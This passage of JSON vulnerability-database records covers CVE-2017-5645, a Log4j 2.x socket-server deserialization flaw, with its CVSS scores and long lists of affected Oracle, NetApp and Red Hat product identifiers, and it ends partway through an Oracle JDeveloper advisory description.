"cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:documaker:12.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:1.2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:insurance_calculation_engine:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:9.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker_cloud_service:5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:22:50", "description": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-04-17T21:59:00", "type": "cve", "title": "CVE-2017-5645", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5645"], "modified": "2023-11-07T02:49:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor:4.0.4.5235", "cpe:/a:netapp:oncommand_api_services:-", "cpe:/a:oracle:application_testing_suite:13.3.0.1", 
"cpe:/a:oracle:endeca_information_discovery_studio:3.2.0", "cpe:/a:oracle:policy_automation:12.2.3", "cpe:/a:oracle:retail_extract_transform_and_load:13.0", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/a:oracle:enterprise_manager_base_platform:13.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5", "cpe:/a:oracle:bi_publisher:12.2.1.3.0", "cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0", "cpe:/a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/a:oracle:policy_automation:10.4.7", "cpe:/a:netapp:service_level_manager:-", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:soa_suite:12.2.2.0.0", "cpe:/a:oracle:bi_publisher:11.1.1.9.0", "cpe:/a:oracle:rapid_planning:12.2", "cpe:/a:oracle:communications_service_broker:6.0", "cpe:/a:oracle:siebel_ui_framework:18.7", "cpe:/a:oracle:primavera_gateway:16.2.11", "cpe:/a:oracle:timesten_in-memory_database:11.2.2.8.49", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.6", "cpe:/a:oracle:retail_integration_bus:16.0", "cpe:/a:oracle:policy_automation:12.2.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.4", "cpe:/a:oracle:flexcube_investor_servicing:12.4.0", "cpe:/a:oracle:autovue_vuelink_integration:21.0.1", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/a:oracle:policy_automation:12.2.2", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1", "cpe:/a:oracle:policy_automation_for_mobile_devices:10.4.7", "cpe:/a:oracle:financial_services_profitability_management:8.0.7.0.0", "cpe:/a:oracle:financial_services_behavior_detection_platform:6.1.1", "cpe:/a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1", "cpe:/o:redhat:enterprise_linux_server_eus:7.4", "cpe:/a:oracle:retail_extract_transform_and_load:13.2", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.5", "cpe:/a:oracle:insurance_calculation_engine:10.2.1", 
"cpe:/a:oracle:communications_pricing_design_center:12.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.6", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.1", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/a:oracle:enterprise_manager_for_oracle_database:13.2.2", "cpe:/a:oracle:tape_library_acsls:8.4", "cpe:/a:oracle:policy_automation:12.2.7", "cpe:/a:oracle:banking_platform:2.6.0", "cpe:/a:oracle:retail_service_backbone:15.0", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.7", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.0", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0", "cpe:/a:oracle:identity_analytics:11.1.1.5.8", "cpe:/a:oracle:financial_services_lending_and_leasing:12.5.0", "cpe:/a:oracle:policy_automation:12.2.8", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5", "cpe:/a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.8", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.2", "cpe:/a:oracle:policy_automation:12.1.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.4", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:oracle:policy_automation:12.2.5", "cpe:/a:oracle:retail_extract_transform_and_load:19.0", "cpe:/a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0", "cpe:/a:oracle:retail_integration_bus:14.1.0", "cpe:/a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0", "cpe:/a:oracle:goldengate:12.3.2.1.1", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2", "cpe:/a:oracle:flexcube_investor_servicing:12.0.4", 
"cpe:/a:oracle:jd_edwards_enterpriseone_tools:9.2", "cpe:/a:oracle:insurance_policy_administration:10.0", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:policy_automation:12.1.1", "cpe:/a:oracle:banking_platform:2.6.2", "cpe:/a:oracle:policy_automation:12.2.9", "cpe:/a:oracle:soa_suite:12.2.1.3.0", "cpe:/a:oracle:autovue_vuelink_integration:21.0.0", "cpe:/a:oracle:communications_instant_messaging_server:10.0.1.3.0", "cpe:/o:redhat:enterprise_linux_server_tus:7.4", "cpe:/a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1", "cpe:/a:netapp:snapcenter:-", "cpe:/a:oracle:communications_interactive_session_recorder:6.2", "cpe:/o:redhat:enterprise_linux_server_tus:7.6", "cpe:/a:oracle:retail_open_commerce_platform:6.0.0", "cpe:/a:oracle:communications_pricing_design_center:11.1", "cpe:/a:oracle:communications_converged_application_server_-_service_controller:6.1", "cpe:/a:oracle:siebel_ui_framework:18.8", "cpe:/a:oracle:in-memory_performance-driven_planning:12.2", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.3", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.10", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/a:oracle:in-memory_performance-driven_planning:12.1", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.3", "cpe:/o:redhat:enterprise_linux_server_eus:7.6", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:oracle:insurance_policy_administration:10.2", "cpe:/a:oracle:siebel_ui_framework:18.9", "cpe:/a:oracle:retail_open_commerce_platform:6.0.1", "cpe:/a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5", "cpe:/a:oracle:goldengate_application_adapters:12.3.2.1.1", "cpe:/a:oracle:weblogic_server:14.1.1.0.0", "cpe:/a:oracle:insurance_calculation_engine:10.1.1", "cpe:/a:oracle:enterprise_manager_base_platform:12.1.0.5", "cpe:/a:oracle:retail_open_commerce_platform:5.3.0", 
"cpe:/a:oracle:identity_management_suite:11.1.2.3.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.5", "cpe:/a:oracle:flexcube_investor_servicing:12.3.0", "cpe:/a:oracle:api_gateway:11.1.2.4.0", "cpe:/a:oracle:soa_suite:12.1.3.0.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.9", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.2.0", "cpe:/a:netapp:oncommand_workflow_automation:-", "cpe:/a:oracle:peoplesoft_enterprise_fin_install:9.2", "cpe:/a:oracle:utilities_work_and_asset_management:1.9.1.2.12", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:policy_automation:12.2.4", "cpe:/a:oracle:financial_services_lending_and_leasing:14.8.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:policy_automation:12.2.6", "cpe:/a:oracle:financial_services_profitability_management:6.1.1", "cpe:/a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0", "cpe:/a:oracle:retail_advanced_inventory_planning:14.0", "cpe:/a:oracle:policy_automation_for_mobile_devices:12.1.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:policy_automation_connector_for_siebel:10.4.6", "cpe:/a:netapp:storage_automation_store:-", "cpe:/a:oracle:flexcube_investor_servicing:14.0.0", "cpe:/a:oracle:policy_automation:12.2.10", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.0.8131", "cpe:/a:oracle:retail_predictive_application_server:15.0.3", "cpe:/a:oracle:mysql_enterprise_monitor:3.4.7.4297", "cpe:/a:oracle:flexcube_investor_servicing:12.1.0", "cpe:/a:oracle:insurance_policy_administration:11.0", "cpe:/a:oracle:configuration_manager:12.1.2.0.2", "cpe:/a:oracle:jdeveloper:12.2.1.3.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.5", "cpe:/a:oracle:retail_integration_bus:14.0.0", "cpe:/a:oracle:identity_management_suite:12.2.1.3.0", "cpe:/a:oracle:bi_publisher:12.2.1.4.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/a:redhat:fuse:1.0", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:retail_extract_transform_and_load:13.1", 
"cpe:/a:oracle:enterprise_manager_for_oracle_database:12.1.0.8", "cpe:/a:oracle:identity_manager_connector:9.0", "cpe:/a:oracle:banking_platform:2.6.1", "cpe:/a:oracle:policy_automation:12.2.1", "cpe:/a:oracle:retail_service_backbone:16.0", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:primavera_gateway:17.12.7", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:enterprise_data_quality:12.2.1.3.0", "cpe:/a:netapp:oncommand_insight:-", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:fusion_middleware_mapviewer:12.2.1.2", "cpe:/a:oracle:bi_publisher:11.1.1.7.0", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:retail_service_backbone:14.1", "cpe:/a:oracle:insurance_policy_administration:10.1", "cpe:/a:oracle:rapid_planning:12.1", "cpe:/a:oracle:insurance_rules_palette:11.1"], "id": "CVE-2017-5645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5645", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:service_level_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:12.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.4:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:policy_automation:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:timesten_in-memory_database:11.2.2.8.49:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.0.8131:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:policy_automation:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:8.0.4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:13.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:policy_automation:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:3.4.7.4297:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_work_and_asset_management:1.9.1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:6.1.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_analytics:11.1.1.5.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_service_broker:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.4.5235:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:12.1.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:11.1.2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:14.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:26", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). 
